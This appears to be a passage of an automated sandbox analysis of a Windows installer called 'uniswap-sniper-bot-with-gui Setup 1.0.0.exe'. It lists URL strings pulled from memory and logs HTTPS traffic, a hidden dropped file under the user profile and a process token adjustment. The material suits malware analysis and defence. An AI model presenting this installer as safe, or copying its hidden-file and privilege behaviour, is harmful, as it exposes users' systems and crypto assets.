Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895487723.0000000005C20000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/sindresorhus/responselike.git
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895487723.0000000005C20000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/sindresorhus/type-fest/blob/78019f42ea888b0cdceb41a4a78163868de57555/index.d.ts
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895487723.0000000005C20000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/sponsors/broofa
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895700933.0000000006120000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/sponsors/colinhacks
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895487723.0000000005C20000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/sponsors/ctavan
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895700933.0000000006120000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/sponsors/ljharb
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895487723.0000000005C20000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/sponsors/sindresorhus
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895700933.0000000006120000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/substack/node-bufferlist
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895487723.0000000005C20000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/szmarczak/cacheable-lookup#readme
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895487723.0000000005C20000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/szmarczak/cacheable-lookup)
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895487723.0000000005C20000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/szmarczak/cacheable-lookup.git
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895487723.0000000005C20000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/szmarczak/cacheable-lookup/issues/42
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895487723.0000000005C20000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/szmarczak/defer-to-connect#readme
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895487723.0000000005C20000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/szmarczak/defer-to-connect.git
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895487723.0000000005C20000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/szmarczak/http-timer#readme
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895487723.0000000005C20000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/szmarczak/http-timer.git
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895487723.0000000005C20000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/szmarczak/http2-wrapper#new-http2agentoptions)
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895487723.0000000005C20000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/szmarczak/http2-wrapper#readme
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895487723.0000000005C20000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/szmarczak/http2-wrapper).
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895487723.0000000005C20000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/szmarczak/http2-wrapper.git
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895700933.0000000006120000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/theturtle32)
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895700933.0000000006120000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/theturtle32/WebSocket-Node
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895700933.0000000006120000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/theturtle32/WebSocket-Node.git
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895700933.0000000006120000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/theturtle32/WebSocket-Node/blob/master/docs/WebSocketClient.md#connectrequesturl-
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895700933.0000000006120000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/theturtle32/WebSocket-Node/issues/288
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895487723.0000000005C20000.00000004.00001000.00020000.00000000.sdmp, uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895276586.0000000005720000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/uuidjs/uuid
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895487723.0000000005C20000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/uuidjs/uuid#getrandomvalues-not-supported
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895487723.0000000005C20000.00000004.00001000.00020000.00000000.sdmp, uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895276586.0000000005720000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/uuidjs/uuid.git
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895700933.0000000006120000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/uuidjs/uuid/blob/main/src/v4.js#L5
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895487723.0000000005C20000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/uuidjs/uuid/pull/434
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1999889491.0000000006EB9000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/w3c/gamepad/pull/112
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1999889491.0000000006EB9000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/w3c/gamepad/pull/112Service
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1999889491.0000000006EB9000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/w3c/gamepad/pull/120
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1999889491.0000000006EB9000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/w3c/gamepad/pull/120Access
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1999889491.0000000006EB9000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/w3c/webappsec-permissions-policy/blob/master/features.md#sensor-features
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1999889491.0000000006EB9000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/w3c/webappsec-permissions-policy/blob/master/features.md#sensor-featuresDeviceOri
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895700933.0000000006120000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/web3/web3.js/issues/4454#issuecomment-1485953455)
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895700933.0000000006120000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/web3/web3.js/issues/6187
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895700933.0000000006120000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/websockets/ws
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895700933.0000000006120000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/websockets/ws/issues/1202
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895700933.0000000006120000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/websockets/ws/issues/1869.
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1999889491.0000000006EB9000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://goo.gl/4NeimX
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1999889491.0000000006EB9000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://goo.gl/7K7WLu
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1999889491.0000000006EB9000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://goo.gl/7K7WLuThe
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1999889491.0000000006EB9000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://goo.gl/7K7WLuWebAudio.AutoplayWebAudio.Autoplay.CrossOriginWebAudio.Autoplay.UnlockType../..
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1999889491.0000000006EB9000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://goo.gl/EuHzyv
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1999889491.0000000006EB9000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://goo.gl/HxfxSQ
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1999889491.0000000006EB9000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://goo.gl/J6ASzs
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1999889491.0000000006E20000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://google-analytics.com/
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895487723.0000000005C20000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://google.com
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1999889491.0000000006EB9000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://google.com/pay
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1999889491.0000000006EB9000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://google.com/payhttps://android.com/paysecure-payment-confirmationAppStoreBillingPlaceHolderZZ
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1999889491.0000000006E20000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://googlevideo.com/
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1999889491.0000000006E20000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://gvt1.com/
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1999889491.0000000006E20000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://gvt2.com/
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1999889491.0000000006E20000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://gvt6.com/
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895700933.0000000006120000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://html.spec.whatwg.org/multipage/comms.html#the-websocket-interface
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895487723.0000000005C20000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://httpbin.org/headers
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1903256672.0000000006020000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/161903006
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1903256672.0000000006020000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/166809097
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1903256672.0000000006020000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/184850002
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1903256672.0000000006020000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/187425444
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1903256672.0000000006020000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/issues/166475273
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895700933.0000000006120000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://json-schema.org/draft/2019-09/json-schema-validation.html#rfc.section.9
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895700933.0000000006120000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://json-schema.org/understanding-json-schema/reference/generic.html
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895487723.0000000005C20000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://localhost/httpbin.org:443
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895042963.0000000004F20000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://myshop.amplify.com/cart/?$
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895487723.0000000005C20000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://nghttp2.org/httpbin/anything
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895700933.0000000006120000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://nodejs.org/)
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895487723.0000000005C20000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://nodejs.org/api/buffer.html#buffer_buffers_and_character_encodings)
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895487723.0000000005C20000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://nodejs.org/api/buffer.html)
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895487723.0000000005C20000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://nodejs.org/api/http.html#http_class_http_agent)
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895487723.0000000005C20000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://nodejs.org/api/http.html#http_class_http_incomingmessage
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895487723.0000000005C20000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://nodejs.org/api/http.html#http_request_settimeout_timeout_callback).
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895487723.0000000005C20000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://nodejs.org/api/https.html#https_class_https_agent)
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895487723.0000000005C20000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://nodejs.org/api/https.html#https_https_request_options_callback)
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895487723.0000000005C20000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://nodejs.org/api/url.html#url_class_url).
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895487723.0000000005C20000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://nodejs.org/api/url.html#url_constructor_new_urlsearchparams_obj).
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895487723.0000000005C20000.00000004.00001000.00020000.00000000.sdmp, uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895276586.0000000005720000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://opensource.org/licenses/MIT
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1999889491.0000000006EB9000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://play.google.com/billing
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1999889491.0000000006EB9000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://play.google.com/billingQuota
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895700933.0000000006120000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://raw.githubusercontent.com/Dogfalo/materialize/master/LICENSE)
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895042963.0000000004F20000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://shop.advanceautoparts.com/web/orderitemdisplay/?$
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895487723.0000000005C20000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://sindresorhus.com
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895487723.0000000005C20000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://sindresorhus.com)
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1999889491.0000000006E20000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://ssl.gstatic.com/
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895700933.0000000006120000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/a/3143231
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895700933.0000000006120000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/a/46181/1550155
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895700933.0000000006120000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/questions/3966484/why-does-modulus-operator-return-fractional-number-in-ja
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895700933.0000000006120000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/questions/55718778/why-abortcontroller-is-not-defined
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895700933.0000000006120000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/questions/7860392/determine-if-string-is-in-base64-using-javascript
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895700933.0000000006120000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://thekevinscott.com/emojis-in-javascript/#writing-a-regular-expression
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895487723.0000000005C20000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://tools.ietf.org/html/rfc5988#section-5
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895700933.0000000006120000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://tools.ietf.org/html/rfc6455#section-9.1
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895487723.0000000005C20000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://tools.ietf.org/html/rfc7230#section-3.3.2
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895487723.0000000005C20000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://tools.ietf.org/html/rfc7231#section-4.3.1)
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895487723.0000000005C20000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://tools.ietf.org/html/rfc7231#section-6.4).
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895487723.0000000005C20000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://tools.ietf.org/html/rfc7231#section-6.4.4).
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895487723.0000000005C20000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://tools.ietf.org/html/rfc7540#section-8.1.3)
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895487723.0000000005C20000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://tools.ietf.org/html/rfc8336
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895700933.0000000006120000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://travis-ci.org/joemccann/dillinger)
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895700933.0000000006120000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://travis-ci.org/joemccann/dillinger.svg?branch=master)
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895700933.0000000006120000.00000004.00001000.00020000.00000000.sdmp, uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1996793114.0000000006020000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://url.spec.whatwg.org/#concept-url-origin
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1999889491.0000000006EB9000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://w3c.github.io/manifest/#installability-signals
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895042963.0000000004F20000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.abebooks.com/servlet/(shopbasketpl
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895042963.0000000004F20000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.academy.com/shop/cart/?$
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895042963.0000000004F20000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.acehardware.com/cart/?$
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895042963.0000000004F20000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.adorama.com/als.mvc/cartview/?$
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895042963.0000000004F20000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.ae.com/us/en/cart/?$
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895042963.0000000004F20000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.altardstate.com/cart/?$
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895042963.0000000004F20000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.anthropologie.com/cart/?$
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895042963.0000000004F20000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.apple.com/(
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895042963.0000000004F20000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.att.com/((
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895042963.0000000004F20000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.backcountry.com/Store/cart/cart.jsp/?$
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895042963.0000000004F20000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.basspro.com/shop/ajaxorderitemdisplayview/?$
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895042963.0000000004F20000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.bathandbodyworks.com/cart/?$
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895042963.0000000004F20000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.bedbathandbeyond.com/store/cart/?$
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895042963.0000000004F20000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.belk.com/shopping-bag/?$
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895042963.0000000004F20000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.bestbuy.com/cart(/
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895042963.0000000004F20000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.bhphotovideo.com/(c/)?find/cart.jsp
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895042963.0000000004F20000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.bloomingdales.com/my-bag/?$
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1999889491.0000000006EB9000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.bluetooth.com/specifications/gatt/characteristics
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1999889491.0000000006EB9000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.bluetooth.com/specifications/gatt/descriptors
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1999889491.0000000006EB9000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.bluetooth.com/specifications/gatt/services
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1999889491.0000000006E20000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.chromestatus.com/feature/4664843055398912
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1999889491.0000000006EB9000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.chromestatus.com/feature/5644273861001216.
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1999889491.0000000006EB9000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.chromestatus.com/feature/5682658461876224.
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1999889491.0000000006EB9000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.chromestatus.com/feature/5718547946799104
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895700933.0000000006120000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.cl.cam.ac.uk/%7Emgk25/ucs/utf8_check.c
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1999889491.0000000006E20000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895700933.0000000006120000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/channel/UCdRihNiJ0tJ7xpFGKcwZcdQ
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895700933.0000000006120000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://zod.dev

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown	Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49746

Source: uniswap-sniper-bot-with-gui.exe, 00000008.00000000.2096036514.00007FF6D63E5000.00000002.00000001.01000000.0000000D.sdmp

Binary or memory string: RegisterRawInputDevices() failed for RIDEV_REMOVE

memstr_5e7ae74f-b

Source: C:\Windows\System32\tar.exe

File created: C:\Users\user\.pyp\DLLs\python_tools.cat

Jump to dropped file

Source: C:\Users\user\Desktop\uniswap-sniper-bot-with-gui Setup 1.0.0.exe

Process token adjusted: Security

Jump to behavior

Source: unicodedata.pyd.22.dr	Static PE information: Resource name: RT_VERSION type: COM executable for DOS
Source: _overlapped.pyd.22.dr	Static PE information: Resource name: RT_VERSION type: COM executable for DOS

